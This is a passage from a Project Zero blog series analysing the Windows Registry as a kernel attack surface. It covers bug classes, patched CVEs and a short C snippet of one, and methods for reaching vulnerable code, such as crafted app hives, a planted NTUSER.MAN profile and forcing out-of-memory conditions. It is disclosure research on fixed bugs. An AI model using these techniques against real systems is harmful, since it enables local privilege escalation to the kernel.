cell at the end of a separate bin, followed by another, empty bin. This behavior would be very similar to how the Special Pool works, but at the bin and cell level.Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency. This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation. In particular, an interesting idea would be to use the self-healing property of the registry. Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process. We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data. Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior. For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks. Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.Conclusion This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them. We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications. See you then!

https://googleprojectzero.blogspot.com/2025/05/the-windows-registry-adventure-7-attack-surface.html
The Windows Registry Adventure #7: Attack surface analysis
2025-05-23T09:05:00Z | 1747991100

Posted by Mateusz Jurczyk, Google Project Zero In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation. I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research. One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right. On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject. And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasons to share the information with the wider community. There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future. In this blog post, we get to the heart of the matter, the actual security of the Windows Registry. I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 ~ 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking. Let's start with a quick recap of the registry's most fundamental properties as an attack surface: Local attack surface for privilege escalation: As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel. It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.Complex, old codebase in a memory-unsafe language: The Windows Registry is a vast and complex mechanism, entirely written in C, most of it many years ago. This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.Present in the core NT kernel: The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown. Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key. Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications. It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights. Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.Manages sensitive information: In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data. This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.Not trivial to fuzz, and not very well documented: Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals. At the same time, obtaining the information is not easy either, especially for the latest registry mechanisms, which are not publicly documented and learning about them basically boils down to reverse engineering. In other words, the entry bar into this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.Security properties The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows.  Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.Broad range of bug classes Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below: Hive memory corruption: Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure. Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.Pool memory corruption: In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools. Firstly, there are cached copies of certain hive data, as described in my previous blog post. Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call. Many of these objects can fall victim to memory management bugs typical of the C language.Information disclosure: Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller. This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file). Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.Race conditions: As a multithreaded environment, Windows allows for concurrent registry access by multiple threads. Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.Logic bugs: In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic. This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances. This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers. Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services. A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification. More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state. The specifics depend on how the privileged process uses the registry interface. If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this: Manual reference counting As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore, must be reference counted. The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption. So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs: Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed. However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker. Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper. As a result, none of these incrementations were protected against integer overflow. This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641). This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024. Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow. Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors. In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything. In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).When the reference count of a security descriptor reaches zero and is released, this operation is irreversible. There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all. This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed. A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one. If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.Aggressive self-healing and recovery As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing. The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered. Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail. Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view. It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure. However, from a security perspective, this behavior is not necessarily advantageous. Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it. In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it. In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation. A classic example of a vulnerability associated with this property is CVE-2023-38139. Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed. For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector. At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights. Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips. No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw. Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors). Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle. Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation. These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive. Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification. The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities. However, such instances rarely cause an immediate system crash or other visible side effects. Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw. However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor. The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load. This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz. This does not mean that they don't exist; their detection just becomes more challenging.Unclear boundaries between hard and conventional format requirements This point is related to the previous section. In the regf format, there are certain requirements that are fairly obvious and must be always met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user. However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required. Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code. We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future. The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice. This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules. In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy. Some examples of such constructs are presented below: Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value. However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object. However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags. However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.Allocated but unused cells: The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data. However, the loader does not require every cell marked "allocated" to be actively used. Similarly, security descriptors with a reference count of zero are typically deallocated. However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list. This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list. These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications. However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not unenforced by the loader: CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading. This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type. If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length. Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances. This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names. However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption. Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of the reg.exe command executions.CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive. For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5. However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability. As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file. If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.Susceptibility to mishandling OOM conditions Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme: NTSTATUS NtHighLevelOperation(...) {   NTSTATUS Status;   Status = HelperFunction1(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }   Status = HelperFunction2(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }     //   // More calls...   //   return STATUS_SUCCESS; } Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on. The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks. Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter). In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer. A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors. The sign of the number is checked by the NT_SUCCESS macro. During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them. A common trait of all actions that modify data in the registry is that they allocate memory. The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePool group. If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller. And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways. So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size. Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited. And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not. Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools. The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines. The situation is even easier if the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive. However, even in system hives, this is often feasible. To perform data spraying on a given hive, we only need a single key granting us write permissions. For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill it to capacity. Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, this is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions. A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability. Considering all this, it is a fair assumption that a local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail. This opens up a large number of potential error paths to analyze. The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user: There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs. First, it stands to reason that on regular computers used by users, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory. This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone. Such rarely executed code paths are always a real treat for security researchers. The second reason is that proper error handling in code is inherently difficult. Many operations involve numerous steps that modify the hive's internal state. If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective). This requires the developer to be fully aware of all changes applied so far when implementing each error path. Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed. One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code: NTSTATUS CmpCommitRenameKeyUoW(_CM_KCB_UOW *uow) {   // ...   if (!CmpAddSubKeyEx(Hive, ParentKey, NewNameKey) ||       !CmpRemoveSubKey(Hive, ParentKey, OldNameKey)) {     CmpFreeKeyByCell(Hive, NewNameKey);     return STATUS_INSUFFICIENT_RESOURCES;   }   // ... } The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't. As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition. A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation, hive unloading. As there was no way to revert the state at the time of the OOM, the vulnerability was fixed by Microsoft by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools and thus there is no longer a physical possibility of them failing. Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error. This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.Susceptibility to mishandling partial successes The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified. However, some functions don't adhere to this operational model. Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible. If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes. This introduces a third possible output state for such functions: complete success, partial success, and complete failure. This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative. In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed. Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them. A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions. The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error. On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation. An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.Overall complexity introduced over time One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced. This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a full-time registry expert that has worked on it full-time over a period of months or years. I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users. Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white. However, over time, more and more shades of gray were being continuously added, departing from the basic assumptions: The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.Registry virtualization has introduced further uncertainty into key operations. When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one. Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry. At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units. This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive. Additionally, the semantics of certain objects and their fields have been altered. Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive. Layered keys have disrupted this dependency. Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name. Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today. The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together. This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry. This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact. Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft. The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below: Some examples of bugs caused by incorrect interactions between these mechanisms include CVE-2023-21675, CVE-2023-21748, CVE-2023-35356, CVE-2023-35357 and CVE-2023-35358.Entry points This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.Hive loading Let's start with the operation of loading user-controlled hives. Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length. Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers). When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses. It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems. It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.App hives The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface. It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators. Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on. In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism. It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors: They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy. This special path is further protected from references by a fully qualified path, which also reduces their usefulness in some offensive applications.The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyW API or its corresponding syscall from the NtUnloadKey family.Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurity function or RegCreateKeyExW with a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.KTM transactions are unconditionally blocked for app hives. Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs. Even if binary control of the hive is not strictly required, it can still be valuable. This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place. By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.User hives and Mandatory User Profiles Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\NTUSER.DAT mounted under \Registry\User\, or in other words, HKCU) or the user classes hive (C:\Users\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem. The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s),  and then log out. User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved. The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation). This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal. However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy. Once the NTUSER.MAN file has been created and loaded, there is no way to delete it by the same user, as it will always be loaded by the system upon login, effectively blocking access to it. A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633. They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU. Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.Log file parsing: .LOG/.LOG1/.LOG2 One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive. This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded. Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load. Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family. Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. Another one is the "incremental log file", a slightly more modern and complex format introduced in Windows 